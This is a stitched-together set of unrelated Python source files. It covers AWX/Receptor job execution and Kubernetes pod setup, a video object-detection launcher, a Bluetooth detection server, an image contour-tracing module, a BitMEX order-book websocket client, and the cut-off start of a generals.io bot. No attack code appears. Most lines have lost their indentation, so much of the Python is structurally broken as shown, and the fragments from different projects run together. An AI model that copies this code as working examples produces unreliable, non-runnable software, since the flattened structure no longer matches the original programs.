# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
        # which exits if the job has finished normally. The context manager ensures we do not
        # leave any threads lying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
try:
unit_status = receptor_ctl.simple_command(f'work status {self.unit_id}')
                detail = unit_status.get('Detail', '')
                state_name = unit_status.get('StateName', '')
except Exception:
detail = ''
state_name = ''
logger.exception(f'An error was encountered while getting status for work unit {self.unit_id}')
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
            # If ansible-runner ran, but an error occurred at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
if not self.task.instance.result_traceback:
try:
resultsock = receptor_ctl.get_work_results(self.unit_id, return_sockfile=True)
lines = resultsock.readlines()
receptor_output = b"".join(lines).decode()
if receptor_output:
self.task.instance.result_traceback = receptor_output
self.task.instance.save(update_fields=['result_traceback'])
elif detail:
self.task.instance.result_traceback = detail
self.task.instance.save(update_fields=['result_traceback'])
else:
logger.warn(f'No result details or output from {self.task.instance.log_format}, status:\n{state_name}')
except Exception:
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
@cleanup_new_process
def transmit(self, _socket):
try:
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
finally:
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
@cleanup_new_process
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.runner_callback.event_handler,
finished_callback=self.task.runner_callback.finished_callback,
status_handler=self.task.runner_callback.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
"pod_pending_timeout": getattr(settings, 'AWX_CONTAINER_GROUP_POD_PENDING_TIMEOUT', "5m"),
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
if self.work_type == 'ansible-runner' and settings.AWX_CLEANUP_PATHS:
# on execution nodes, we rely on the private data dir being deleted
cli_params = f"--private-data-dir={private_data_dir} --delete"
else:
# on hybrid nodes, we rely on the private data dir NOT being deleted
cli_params = f"--private-data-dir={private_data_dir}"
receptor_params = {"params": cli_params}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
return 'kubernetes-runtime-auth'
return 'kubernetes-incluster-auth'
if self.task.instance.execution_node == settings.CLUSTER_HOST_ID or self.task.instance.execution_node == self.task.instance.controller_node:
return 'local'
return 'ansible-runner'
@cleanup_new_process
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.runner_callback.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
time.sleep(1)
@property
def pod_definition(self):
ee = self.task.instance.execution_environment
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
# According to the deepmerge docstring, the second dictionary will override when
# they share keys, which is the desired behavior.
# This allows user to only provide elements they want to override, and for us to still provide any
# defaults they don't want to change
pod_spec = deepmerge(default_pod_spec, pod_spec_override)
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
# Enforce EE Pull Policy
pull_options = {"always": "Always", "missing": "IfNotPresent", "never": "Never"}
if self.task and self.task.instance.execution_environment:
if self.task.instance.execution_environment.pull:
pod_spec['spec']['containers'][0]['imagePullPolicy'] = pull_options[self.task.instance.execution_environment.pull]
if self.task and self.task.instance.is_container_group_task:
# If EE credential is passed, create an imagePullSecret
if self.task.instance.execution_environment and self.task.instance.execution_environment.credential:
# Create pull secret in k8s cluster based on ee cred
from awx.main.scheduler.kubernetes import PodManager # prevent circular import
pm = PodManager(self.task.instance)
secret_name = pm.create_secret(job=self.task.instance)
# Inject secret name into podspec
pod_spec['spec']['imagePullSecrets'] = [{"name": secret_name}]
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
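# Minimal sketch (not part of the upstream module) of the socketpair streaming
# pattern used by _run_internal/transmit above: a writer thread streams the
# payload into one end of a socketpair while the reader consumes the other end,
# and shutting down the write side is what signals EOF to the reader.
def _socketpair_stream_sketch(payload=b'example payload'):
    sockin, sockout = socket.socketpair()
    def _writer():
        try:
            sockin.sendall(payload)
        finally:
            # Without this shutdown the reader below would block forever.
            sockin.shutdown(socket.SHUT_WR)
    writer = threading.Thread(target=_writer)
    writer.start()
    received = sockout.makefile('rb').read()  # reads until EOF
    writer.join()
    sockin.close()
    sockout.close()
    return received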
|
main.py
|
# encoding=utf-8
import detection_inference
import cv2
import numpy as np
import client
import threading
import ChannelManager
from presenter_types import *
import time
import os
import sys
import re
from graph import *
# Validate the input URL: it must be an rtsp:// stream or a .mp4 file
lenofUrl = len(sys.argv)
if lenofUrl <= 1:
print("[ERROR] Please input mp4/Rtsp URL")
exit()
elif lenofUrl >= 3:
print("[ERROR] param input Error")
exit()
URL = sys.argv[1]
URL1 = re.match('rtsp://', URL)
URL2 = re.search(r'\.mp4$', URL)
if URL1 is None:
if URL2 is None:
print("[ERROR] should input correct URL")
exit()
else:
mp4_url = True
else:
mp4_url = False
detection_app = detection_inference.detectionInference()
detection_app.clientsocket = client.PresenterSocketClient((presenter_ip, presenter_port), 5, None)
thread_1 = threading.Thread(target=detection_app.clientsocket.start_connect)
thread_1.daemon = True
thread_1.start()
time.sleep(0.1)
if detection_app.graph is None:
print('Create Graph Failed!')
exit()
channel_manager = ChannelManager.ChannelManager()
data = channel_manager.OpenChannel()
if detection_app.clientsocket is None:
print('detection_app.clientsocket is None')
exit()
detection_app.clientsocket.send_data(data)
cap = cv2.VideoCapture(URL)
ret, frame = cap.read()
if mp4_url:
try:
while ret:
detection_inference.dowork(frame,detection_app)
ret, frame = cap.read()
except Exception as e:
print("ERROR",e)
finally:
detection_app.dispose()
else:
rtsp_queue = client.Queue()
sub_thread = threading.Thread(target=detection_inference.sqEngine,args=(rtsp_queue,detection_app))
    sub_thread.daemon = True
sub_thread.start()
try:
while ret:
rtsp_queue.put(frame)
ret, frame = cap.read()
except Exception as e:
print("ERROR",e)
finally:
cv2.destroyAllWindows()
cap.release()
detection_app.dispose()
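# Hypothetical helper (illustrative, not part of the original script): the same
# URL check performed above, wrapped in a function for reuse.
def _is_supported_url(url):
    return url.startswith('rtsp://') or re.search(r'\.mp4$', url) is not None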
|
bt_server.py
|
import bluetooth, threading, time, cv2
from detection_utils import extract_box, nms, handle_prediction
from camera_parameters import *
import datetime
LBL_DATA_DELIMITER = '&&&'
DATA_START_SYMBOL = '###'
SIZE_START_SYMBOL = '$$$'
START_DET_COMMAND = 'START'
STOP_DET_COMMAND = 'STOP'
SEND_TEST_IMG_COMMAND = 'TEST CAMERA'
class BTServer:
    '''
    Bluetooth server used to send detection data to the user's phone and to
    handle user commands such as start/stop detection.
    '''
def __init__(self):
self.accepting = False
self.test_required = False
self.sending = False
self.detecting = False
def startAdvertising(self):
t = threading.Thread(target=(self._advertise))
t.daemon = True
t.start()
return self
def startAccepting(self):
if not self.accepting:
t = threading.Thread(target=(self._accept))
t.daemon = True
t.start()
return self
def startSendingDetections(self, outputs, im):
self.outputs = outputs
self.im = im
t = threading.Thread(target=(self._sender))
t.daemon = True
t.start()
return self
def startReceiving(self):
t = threading.Thread(target=(self._receive))
t.daemon = True
t.start()
return self
def _receive(self):
while not self.test_required:
command = self.socket.recv(1024)
if command.decode('utf-8') == SEND_TEST_IMG_COMMAND:
print('required')
self.test_required = True
if command.decode('utf-8') == START_DET_COMMAND:
print('started detection')
self.detecting = True
if command.decode('utf-8') == STOP_DET_COMMAND:
print('paused detection')
self.detecting = False
def sendTestImage(self, im):
        img_bytes = cv2.imencode('.jpg', im)[1].tobytes()
data_size = len(img_bytes)
while self.sending:
time.sleep(0.5)
self.socket.send(SIZE_START_SYMBOL + str(data_size))
print('sent size')
self.socket.sendall(DATA_START_SYMBOL.encode() + img_bytes)
self.test_required = False
self.startReceiving()
def _accept(self):
self.accepting = True
self.socket, address = self.serverSocket.accept()
print('Got connection with', address)
self.accepting = False
self._receive()
def _advertise(self):
name = 'bt_server'
target_name = 'test'
uuid = '94f39d29-7d6d-437d-973b-fba39e49d4ee'
self.serverSocket = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
port = bluetooth.PORT_ANY
self.serverSocket.bind(('', port))
print('Listening for connections on port: ', port)
self.serverSocket.listen(1)
port = self.serverSocket.getsockname()[1]
bluetooth.advertise_service((self.serverSocket),
'RoadeyeServer',
service_id=uuid,
service_classes=[
uuid, bluetooth.SERIAL_PORT_CLASS],
profiles=[
bluetooth.SERIAL_PORT_PROFILE])
self._accept()
def _sender(self):
tic = time.time()
detection_time = str(datetime.datetime.now().strftime('%c'))
boxes, classes, scores = handle_prediction(self.outputs)
boxes, classes, scores = nms(boxes, classes, scores, 0.5)
print('num of detections:', len(boxes))
while self.sending:
time.sleep(0.5)
try:
self.sending = True
for i, box in enumerate(boxes):
print(classes[i])
box_im = extract_box(box, self.im)
                img_bytes = cv2.imencode('.jpg', box_im)[1].tobytes()
label_and_img = (DATA_START_SYMBOL + classes[i] + LBL_DATA_DELIMITER).encode() + img_bytes
data_size = len(label_and_img) - len(DATA_START_SYMBOL)
print(data_size)
print(classes[i])
self.socket.send(SIZE_START_SYMBOL + str(data_size))
self.socket.sendall(label_and_img)
        except Exception:
            # The client may have disconnected mid-send; drop this batch and continue.
            pass
self.sending = False
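# Illustrative sketch (not part of the server) of the framing used by _sender
# and sendTestImage above: each detection is announced with a '$$$<size>'
# header, followed by '###<label>&&&<jpeg bytes>', where <size> excludes the
# '###' start symbol. The header is encoded here for clarity; the server above
# sends it as a str.
def _frame_detection(label, img_bytes):
    payload = (DATA_START_SYMBOL + label + LBL_DATA_DELIMITER).encode() + img_bytes
    size = len(payload) - len(DATA_START_SYMBOL)
    header = (SIZE_START_SYMBOL + str(size)).encode()
    return header, payload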
|
image_process.py
|
from ..common.event import EventDispatcher
from ..common.events import *
from ..engine.vector import Vector
from ..input.image_input import ImageInput
from multiprocessing import Process, Pipe, Pool
import copy
import time
import operator
import numpy as np
import math
import time
def processYImage(img):
results = list()
img_height = img.shape[0]
img_width = img.shape[1]
img = img.reshape((img_width,img_height))
threshold = 150
min_length = 12
def isWithinBounds(position):
return position.x >= 0 and position.x < img_width and position.y >= 0 and position.y < img_height
def addPixel(pixel, size = Vector(1,1), direction = Key.DEBUG):
results.append(ImageInput(pixel, direction, size))
def clearArea(center, size):
img[center.y - size.y / 2: center.y + size.y / 2 + 1, center.x - size.x / 2:center.x + size.x / 2 + 1] = 0
def getValueFromArea(center, size):
return np.average(img[center.y - size.y / 2: center.y + size.y / 2 + 1, center.x - size.x / 2:center.x + size.x / 2 + 1])
def getValue(center):
if center.x < 0:
return 0
if center.x >= img_width:
return 0
if center.y < 0:
return 0
if center.y >= img_height:
return 0
return img[center.y][center.x]
def useWilburContour(start):
start_time = time.time()
cy = start.y
cx = start.x
min_x = 0
max_x = img_width - 1
min_y = cy
max_y = img_height - 1
# Find bottom right corner.
x = cx
for y in range(cy + 1, max_y + 1, +1):
if img[y][x] < threshold:
y -= 1
break
for x in range(x, max_x + 1, +1):
if img[y][x] < threshold:
if (x > min_x):
x -= 1
break
if (x > min_x):
x -= 1
for y in range(y, max_y + 1, +1):
if img[y][x] < threshold:
y -= 1
break
right = Vector(x - cx, y - cy)
# Find top left corner.
x = cx
for y in range(cy + 1, max_y + 1, +1):
if img[y][x] < threshold:
y -= 1
break
for x in range(x, min_x - 1, -1):
if img[y][x] < threshold:
if (x < max_x):
x += 1
break
if (x < max_x):
x += 1
for y in range(y, min_y - 1, -1):
if img[y][x] < threshold:
y += 1
break
left = Vector(x - cx, y - cy)
# Crudely calculate the length.
center = start + (left+right) / 2
length = math.sqrt(Vector.DistanceSqu(left, right) * 2.0)
if center.x - length / 2 < 0:
length = center.x * 2
if center.x + length / 2 > img_width - 1:
length = ((img_width - 1) - center.x) * 2
if center.y - length / 2 < 0:
length = center.y * 2
if center.y + length / 2 > img_height - 1:
length = ((img_height - 1) - center.y) * 2
length = int(length)
#print 'wilbur', time.time() - start_time
return (center, Vector(length, length))
def useSquareTracing(start):
up = 'up'
right = 'right'
down = 'down'
left = 'left'
delta = {
up : Vector(0, -1),
down : Vector(0, 1),
left : Vector(-1, 0),
right : Vector(1, 0)
}
turn_left = {
up : left,
down : right,
left : down,
right : up
}
turn_right = {
up : right,
down : left,
left : up,
right : down
}
def onUp(position):
position.y -= 1
def onDown(position):
position.y += 1
def onLeft(position):
position.x -= 1
def onRight(position):
position.x += 1
onMove = {
up : onUp,
down : onDown,
left : onLeft,
right : onRight
}
top_left = copy.copy(start)
bot_right = copy.copy(start)
start_time = time.time()
direction = right
start_direction = direction
position = start
while(getValue(position + delta[direction]) < threshold):
direction = turn_right[direction]
if direction == start_direction:
return (start, Vector(1,1))
position += delta[direction]
#onMove[direction](position)
while(not position == start):
if (time.time() - start_time) > 0.25:
break
if (getValue(position) >= threshold):
if (position.y > bot_right.y):
bot_right.y = position.y
if (position.x < top_left.x):
top_left.x = position.x
if (position.x > bot_right.x):
bot_right.x = position.x
direction = turn_left[direction]
else:
direction = turn_right[direction]
#position += delta[direction]
onMove[direction](position)
#print time.time() - start_time
return ((top_left + bot_right) / 2, bot_right - top_left + Vector(3,3))
def useMooreNeighborTracing(start):
start_time = time.time()
up = 'up'
right = 'right'
down = 'down'
left = 'left'
delta = {
up : Vector(0, -1),
down : Vector(0, 1),
left : Vector(-1, 0),
right : Vector(1, 0)
}
turn_left = {
up : left,
down : right,
left : down,
right : up
}
turn_right = {
up : right,
down : left,
left : up,
right : down
}
top_left = copy.copy(start)
bot_right = copy.copy(start)
start_time = time.time()
direction = right
position = start + delta[direction]
start_direction = copy.copy(direction)
while(getValue(position + delta[direction]) < threshold):
direction = turn_right[direction]
if direction == start_direction:
return (start, Vector(1,1))
while(not position == start):
if (time.time() - start_time) > 0.1:
break
if (getValue(position) >= threshold):
if (position.y > bot_right.y):
bot_right.y = position.y
if (position.x < top_left.x):
top_left.x = position.x
if (position.x > bot_right.x):
bot_right.x = position.x
direction = turn_left[direction]
start_position = position
position = start_position + delta[direction]
while(getValue(position) < threshold):
direction = turn_right[direction]
position = start_position + delta[direction]
return ((top_left + bot_right) / 2, bot_right - top_left + Vector(2,2))
start_time = time.time()
cycles = 0
while True:
if (time.time() - start_time) > 2.0:
break
cycles += 1
candidates = np.argwhere(img >= threshold)
if len(candidates) == 0:
break
candidate = candidates[0]
cy = candidate[0]
cx = candidate[1]
# Stop processing if the newest value is at the bottom.
if (cy > img_height - min_length):
break
#useMooreNeighborTracing(Vector(cx, cy))
(center, size) = useSquareTracing(Vector(cx, cy))
#(center, size) = useWilburContour(Vector(cx, cy))
y = center.y
x = center.x
if (size.x <= min_length or size.y <= min_length):
clearArea(center, size)
continue
step = 2
value = img[y][x]
value_threshold = threshold / 2
step_limit = min_length - step
if (y - step_limit < 0 or x - step_limit < 0 or x + step_limit >= img_width):
clearArea(center, size)
continue
for delta in range(0, step_limit):
if abs(value - int(img[y - delta][x])) > value_threshold:
y = y - delta
break
if abs(value - int(img[y][x - delta])) > value_threshold:
x = x - delta
break
if abs(value - int(img[y][x + delta])) > value_threshold:
x = x + delta
break
top = getValueFromArea(Vector(x,y - step), Vector(step * 2, 0))
bottom = getValueFromArea(Vector(x,y + step), Vector(step * 2, 0))
left = getValueFromArea(Vector(x - step,y), Vector(0, step * 2))
right = getValueFromArea(Vector(x + step,y), Vector(0, step * 2))
min_value = min(top, bottom, left, right)
key_direction = None
if min_value < threshold and min_value > 0.0:
if (top == min_value):
key_direction = Key.UP
elif (bottom == min_value):
key_direction = Key.DOWN
elif (left == min_value):
key_direction = Key.LEFT
elif (right == min_value):
key_direction = Key.RIGHT
if not (key_direction == None):
addPixel(center, size, key_direction)
clearArea(center, size)
if (time.time() - start_time > 1.0):
            print(cycles, time.time() - start_time)
return results
def yImageWorker(pipe):
main_conn, worker_conn = pipe
while True:
data = worker_conn.recv()
if data == ImageProcess.END_MESSAGE:
            break
result = processYImage(data.data)
worker_conn.send((data.timestamp, result))
class ImageProcess(object):
END_MESSAGE = 'END'
def __init__(self):
EventDispatcher().add_event_listener(YImageEvent.TYPE, self.onYImageEvent)
self._main1_conn, self._worker1_conn = Pipe()
self._worker1_ready = True
self._worker1 = Process(target=yImageWorker, args=((self._main1_conn, self._worker1_conn),))
self._worker1.daemon = True
self._worker1.start()
self._main2_conn, self._worker2_conn = Pipe()
self._worker2_ready = True
self._worker2 = Process(target=yImageWorker, args=((self._main2_conn, self._worker2_conn),))
self._worker2.daemon = True
self._worker2.start()
def onYImageEvent(self, event):
if self._worker1_ready:
self._worker1_ready = False
self._main1_conn.send(event.data()[0])
if self._worker2_ready:
self._worker2_ready = False
self._main2_conn.send(event.data()[1])
def stop(self):
self._main1_conn.send(ImageProcess.END_MESSAGE)
while self._main1_conn.poll():
self._main1_conn.recv()
self._main2_conn.send(ImageProcess.END_MESSAGE)
while self._main2_conn.poll():
self._main2_conn.recv()
self._worker1.join()
self._worker2.join()
def update(self):
if self._main1_conn.poll():
data = self._main1_conn.recv()
self._worker1_ready = True
EventDispatcher().dispatch_event(LatencyEvent(LatencyEvent.P1_PROCESSING, data[0]))
EventDispatcher().dispatch_event(CameraResultEvent(CameraResultEvent.P1, data[1]))
if self._main2_conn.poll():
data = self._main2_conn.recv()
self._worker2_ready = True
EventDispatcher().dispatch_event(LatencyEvent(LatencyEvent.P2_PROCESSING, data[0]))
EventDispatcher().dispatch_event(CameraResultEvent(CameraResultEvent.P2, data[1]))
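# Minimal sketch (not part of this module) of the Pipe/worker pattern used by
# ImageProcess above: the parent sends work down one end of a Pipe, the worker
# replies with a (timestamp, result) tuple, and the END sentinel stops it.
def _demo_worker(conn):
    while True:
        item = conn.recv()
        if item == ImageProcess.END_MESSAGE:
            break
        conn.send(('timestamp', item * 2))  # stand-in for processYImage()
def _pipe_worker_sketch():
    parent_conn, child_conn = Pipe()
    worker = Process(target=_demo_worker, args=(child_conn,))
    worker.daemon = True
    worker.start()
    parent_conn.send(21)
    result = parent_conn.recv()  # ('timestamp', 42)
    parent_conn.send(ImageProcess.END_MESSAGE)
    worker.join()
    return result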
|
bitmex_book.py
|
# -*- coding: utf-8 -*-
# - OrderBook Websocket Thread -
# 🦏 **** quan.digital **** 🦏
# authors: canokaue & thomgabriel
# date: 03/2020
# kaue.cano@quan.digital
# Simplified implementation of connecting to BitMEX websocket for streaming realtime orderbook data.
# Optimized for OrderBookL2 handling using Red and Black Binary Search Trees - https://www.programiz.com/dsa/red-black-tree
# Originally developed for Quan Digital's Whale Watcher project - https://github.com/quan-digital/whale-watcher
# Code based on stock Bitmex API connectors - https://github.com/BitMEX/api-connectors/tree/master/official-ws/python/bitmex_websocket.py
# As well as pmaji's GDAX OrderBook thread - https://github.com/pmaji/crypto-whale-watching-app/blob/master/gdax_book.py
# The Websocket offers a bunch of data as raw properties right on the object.
# On connect, it synchronously asks for a push of all this data then returns.
# Docs: https://www.bitmex.com/app/wsAPI
import websocket
import threading
import traceback
from time import sleep
import json
import logging
import urllib
from decimal import Decimal
from bintrees import RBTree
from operator import itemgetter
from tqdm import tqdm
# Websocket timeout in seconds
CONN_TIMEOUT = 5
# It's recommended not to grow a table larger than 200. Helps cap memory usage.
MAX_TABLE_LEN = 200
class BitMEXBook:
def __init__(self, endpoint="https://www.bitmex.com/api/v1", symbol='XBTUSD'):
'''Connect to the websocket and initialize data stores.'''
self.logger = logging.getLogger(__name__)
self.logger.debug("Initializing WebSocket.")
self.endpoint = endpoint
self.symbol = symbol
self.data = {}
self.keys = {}
self.exited = False
self._asks = RBTree()
self._bids = RBTree()
# We can subscribe right in the connection querystring, so let's build that.
# Subscribe to all pertinent endpoints
wsURL = self.__get_url()
self.logger.debug("Connecting to %s" % wsURL)
self.__connect(wsURL, symbol)
self.logger.info('Connected to WS, waiting for partials.')
# Connected. Wait for partials
self.__wait_for_symbol(symbol)
self.logger.info('Got all market data. Starting.')
def init(self):
self.logger.debug("Initializing WebSocket...")
self.data = {}
self.keys = {}
self.exited = False
wsURL = self.__get_url()
self.logger.debug("Connecting to URL -- %s" % wsURL)
self.__connect(wsURL, self.symbol)
self.logger.info('Connected to WS, waiting for partials.')
# Connected. Wait for partials
self.__wait_for_symbol(self.symbol)
self.logger.info('Got all market data. Starting.')
def error(self, err):
self._error = err
self.logger.error(err)
#self.exit()
def __del__(self):
self.exit()
def reset(self):
self.logger.warning('Websocket resetting...')
self.ws.close()
        self.logger.info('Websocket closed.')
self.logger.info('Restarting...')
self.init()
def exit(self):
'''Call this to exit - will close websocket.'''
self.exited = True
self.ws.close()
### Main orderbook function
def get_current_book(self):
result = {
'asks': [],
'bids': []
}
for ask in self._asks:
try:
# There can be a race condition here, where a price point is removed
# between these two ops
this_ask = self._asks[ask]
except KeyError:
continue
for order in this_ask:
result['asks'].append([order['price'],(order['size']/Decimal(order['price'])), order['id']]) #(order['size']/Decimal(order['price']))
# Same procedure for bids
for bid in self._bids:
try:
this_bid = self._bids[bid]
except KeyError:
continue
for order in this_bid:
result['bids'].append([order['price'], (order['size']/Decimal(order['price'])), order['id']]) #(order['size']/Decimal(order['price']))
return result
# -----------------------------------------------------------------------------------------
# ----------------------RBTrees Handling---------------------------------------------------
# -----------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------
# Get current minimum ask price from tree
def get_ask(self):
return self._asks.min_key()
# Get ask given id
def get_asks(self, id):
return self._asks.get(id)
    # Remove ask from tree
def remove_asks(self, id):
self._asks.remove(id)
# Insert ask into tree
def set_asks(self, id, asks):
self._asks.insert(id, asks)
# Get current maximum bid price from tree
def get_bid(self):
return self._bids.max_key()
# Get bid given id
def get_bids(self, id):
return self._bids.get(id)
    # Remove bid from tree
def remove_bids(self, id):
self._bids.remove(id)
# Insert bid into tree
def set_bids(self, id, bids):
self._bids.insert(id, bids)
    # Add order to our watched orders
def add(self, order):
order = {
'id': order['id'], # Order id data
'side': order['side'], # Order side data
'size': Decimal(order['size']), # Order size data
'price': order['price'] # Order price data
}
if order['side'] == 'Buy':
bids = self.get_bids(order['id'])
if bids is None:
bids = [order]
else:
bids.append(order)
self.set_bids(order['id'], bids)
else:
asks = self.get_asks(order['id'])
if asks is None:
asks = [order]
else:
asks.append(order)
self.set_asks(order['id'], asks)
# Order is done, remove it from watched orders
def remove(self, order):
oid = order['id']
if order['side'] == 'Buy':
bids = self.get_bids(oid)
if bids is not None:
bids = [o for o in bids if o['id'] != order['id']]
if len(bids) > 0:
self.set_bids(oid, bids)
else:
self.remove_bids(oid)
else:
asks = self.get_asks(oid)
if asks is not None:
asks = [o for o in asks if o['id'] != order['id']]
if len(asks) > 0:
self.set_asks(oid, asks)
else:
self.remove_asks(oid)
# Updating order price and size
def change(self, order):
new_size = Decimal(order['size'])
# Bitmex updates don't come with price, so we use the id to match it instead
oid = order['id']
if order['side'] == 'Buy':
bids = self.get_bids(oid)
if bids is None or not any(o['id'] == order['id'] for o in bids):
return
index = list(map(itemgetter('id'), bids)).index(order['id'])
bids[index]['size'] = new_size
self.set_bids(oid, bids)
else:
asks = self.get_asks(oid)
if asks is None or not any(o['id'] == order['id'] for o in asks):
return
index = list(map(itemgetter('id'), asks)).index(order['id'])
asks[index]['size'] = new_size
self.set_asks(oid, asks)
# -----------------------------------------------------------------------------------------
# ----------------------WS Private Methods-------------------------------------------------
# -----------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------
def __connect(self, wsURL, symbol):
'''Connect to the websocket in a thread.'''
self.logger.debug("Starting thread")
self.ws = websocket.WebSocketApp(wsURL,
on_message=self.__on_message,
on_close=self.__on_close,
on_open=self.__on_open,
on_error=self.__on_error)
self.wst = threading.Thread(target=lambda: self.ws.run_forever())
self.wst.daemon = True
self.wst.start()
self.logger.debug("Started thread")
# Wait for connect before continuing
conn_timeout = CONN_TIMEOUT
while (not self.ws.sock or not self.ws.sock.connected) and conn_timeout:
sleep(1)
conn_timeout -= 1
if not conn_timeout:
self.logger.error("Couldn't connect to WS! Exiting.")
# self.exit()
# raise websocket.WebSocketTimeoutException('Couldn\'t connect to WS! Exiting.')
self.reset()
def __get_url(self):
'''
Generate a connection URL. We can define subscriptions right in the querystring.
Most subscription topics are scoped by the symbol we're listening to.
'''
symbolSubs = ["orderBookL2"]
subscriptions = [sub + ':' + self.symbol for sub in symbolSubs]
urlParts = list(urllib.parse.urlparse(self.endpoint))
urlParts[0] = urlParts[0].replace('http', 'ws')
urlParts[2] = "/realtime?subscribe={}".format(','.join(subscriptions))
return urllib.parse.urlunparse(urlParts)
def __wait_for_symbol(self, symbol):
'''On subscribe, this data will come down. Wait for it.'''
pbar = tqdm(total=160)
# Wait until data reaches our RBTrees
while self._asks.is_empty() and self._bids.is_empty():
sleep(0.1)
pbar.update(3)
pbar.close()
def __send_command(self, command, args=None):
'''Send a raw command.'''
if args is None:
args = []
self.ws.send(json.dumps({"op": command, "args": args}))
def __on_message(self, message):
'''Handler for parsing WS messages.'''
message = json.loads(message)
# self.logger.debug(json.dumps(message))
table = message['table'] if 'table' in message else None
action = message['action'] if 'action' in message else None
# table = message.get("table")
# action = message.get("action")
try:
# RBTrees for orderBook
if table == 'orderBookL2':
# For every order received
try:
for order in message['data']:
if action == 'partial':
self.logger.debug('%s: adding partial %s' % (table, order))
self.add(order)
elif action == 'insert':
self.logger.debug('%s: inserting %s' % (table, order))
self.add(order)
elif action == 'update':
self.logger.debug('%s: updating %s' % (table, order))
self.change(order)
elif action == 'delete':
self.logger.debug('%s: deleting %s' % (table, order))
self.remove(order)
else:
raise Exception("Unknown action: %s" % action)
except:
self.logger.error('Error handling RBTrees: %s' % traceback.format_exc())
# Uncomment this to watch RBTrees evolution in real time
# self.logger.info('==============================================================')
# self.logger.info('=============================ASKS=============================')
# self.logger.info('==============================================================')
# self.logger.info(self._asks)
# self.logger.info('==============================================================')
# self.logger.info('=============================BIDS=============================')
# self.logger.info('==============================================================')
# self.logger.info(self._bids)
except:
self.logger.error(traceback.format_exc())
def __on_error(self, error):
'''Called on fatal websocket errors. We exit on these.'''
if not self.exited:
self.logger.error("Error : %s" % error)
raise websocket.WebSocketException(error)
def __on_open(self):
'''Called when the WS opens.'''
self.logger.debug("Websocket Opened.")
def __on_close(self):
'''Called on websocket close.'''
self.logger.info('Websocket Closed')
# Utility method for finding an item in the store.
# When an update comes through on the websocket, we need to figure out which item in the array it is
# in order to match that item.
# Helpfully, on a data push (or on an HTTP hit to /api/v1/schema), we have a "keys" array. These are the
# fields we can use to uniquely identify an item. Sometimes there is more than one, so we iterate through
# all provided keys.
def find_by_keys(keys, table, matchData):
for item in table:
if all(item[k] == matchData[k] for k in keys):
return item
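# Illustrative usage sketch (hypothetical rows, not part of the connector):
# find_by_keys matches an incoming update against stored table rows using the
# key fields announced in the websocket's "keys" message.
def _find_by_keys_example():
    rows = [{'symbol': 'XBTUSD', 'id': 1, 'size': 10},
            {'symbol': 'XBTUSD', 'id': 2, 'size': 20}]
    # Returns the second row, matched on ('symbol', 'id').
    return find_by_keys(['symbol', 'id'], rows, {'symbol': 'XBTUSD', 'id': 2, 'size': 25})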
|
generals.py
|
'''
Generals.io Automated Client - https://github.com/harrischristiansen/generals-bot
Client Adopted from @toshima Generals Python Client - https://github.com/toshima/generalsio
'''
import logging
import json
import threading
import time
from websocket import create_connection, WebSocketConnectionClosedException
import map
_ENDPOINT = "ws://botws.generals.io/socket.io/?EIO=3&transport=websocket"
class Generals(object):
def __init__(self, userid, username, mode="1v1", gameid=None,
force_start=True):
logging.debug("Creating connection")
self._ws = create_connection(_ENDPOINT)
self._lock = threading.RLock()
logging.debug("Starting heartbeat thread")
